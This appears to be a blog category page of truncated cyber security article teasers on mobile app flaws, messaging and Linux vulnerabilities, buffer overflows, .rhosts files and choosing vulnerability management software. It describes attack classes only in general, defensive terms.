cyber security

Uncovering Mobile App Flaws

by

In    addition    to    running    a    tool    such    as    CxSuite    to    check    for    mobile    app    vulnerabilities, there    are    several    other    things    you’ll    want    to    look    for    including: Cryptographic    database    keys    that    are    hard-coded    into    the    app Improper    handling    of    sensitive    information    such    as    storing    personally-identifiable information    (a.k.a.    PII)    locally    where    the    user    and    other    apps    can   … Read more

Messaging System Vulnerabilities

by

Practically    all    messaging    applications    are    hacking    targets    on    your    network.    Given    the proliferation    and    business    dependence    on    e-mail,    just    about    anything    is    fair    game.    Ditto with    VoIP.    It’s    downright    scary    what    people    with    ill    intent    can    do    with    it. With    messaging    systems,    one    underlying    weaknesses    is    that    many    of    the    supporting protocols    weren’t    designed    with   … Read more

Checking Physical Security

by

Some    Linux    vulnerabilities    involve    the    bad    guy    actually    being    at    the    system    console    — something    that’s    entirely    possible    given    the    insider    threats    that    every    organization faces. Physical    security    hacks If    an    attacker    is    at    the    system    console,    anything    goes,    including    rebooting    the    system (even    if    no    one    is    logged    in)    by    pressing    Ctrl+Alt+Delete.    After    the   … Read more

Finding Buffer Overflow Vulnerabilities

by

RPC    and    other    vulnerable    daemons    are    common    targets    for    buffer-overflow    attacks. Buffer    overflow    attacks    are    often    how    the    hacker    can    get    in    to    modify    system    files, read    database    files,    and    more. Attacks In    a    buffer    overflow    attack,    the    attacker    either    manually    sends    strings    of    information    to the    victim    Linux    machine    or    writes    a    script    to   … Read more

Securing the .rhosts and hosts.equiv Files

by

Linux    —    and    all    the    flavors    of    UNIX    —    are    file-based    operating    systems.    Practically everything    that’s    done    on    the    system    involves    the    manipulation    of    files.    This    is    why    so many    attacks    against    Linux    are    at    the    file    level. Hacks    using    the    hosts.equiv    and    .rhosts    files If    hackers    can    capture    a    user    ID    and    password    by   … Read more

Cyber Security

by

Cyber security measures are associated with managing risks, patching vulnerabilities and improving system resilience. Key research subjects include techniques associated with detecting different network behavior anomalies and malware, and IT questions related to IT security. Since these research subjects mainly concentrate on the physical, syntactic and semantic layers, present research infrastructures are focused on studying … Read more

Commercial software: Not cheap, but has maintenance

by

The other option for running VM software yourself is to use commercial software. Most people automatically think of commercial software as a ‘safe’ option, and it usually constitutes the bulk of installed applications. But commercial software has drawbacks, so consider these points: Commercial software costs real money. You have to buy it, and that requires … Read more

Open Source software: Free, but not cheap

by

Open Source software is usually developed in an open, collaborative manner. The software is typically free, and users are able to use, change, improve, or share it. However, three considerations about Open Source software don’t bode well for use with VM: Questionable code. Open Source code is developed by the public, and you can’t be … Read more

Run Software Yourself

by

Software-based solutions enable you to install software for vulnerability management on your internal network and run them yourself. Software can automate many processes for VM. However, having the control over VM software carries the usual price tag of having to manage it (and secure it). You have to successfully operate and maintain everything – in … Read more

Identifying the vulnerability shortlist

by

The VM solution you select needs to provide the capability to scan for and fix vulnerabilities in a broad range of categories, including: Back Doors and Trojan Horses (bypass authentication systems).  Brute force attacks (defies cryptography by systematically trying different keys). CGI (exploits the Common Gateway Interface). Databases. DNS and Bind (exploits Domain Name … Read more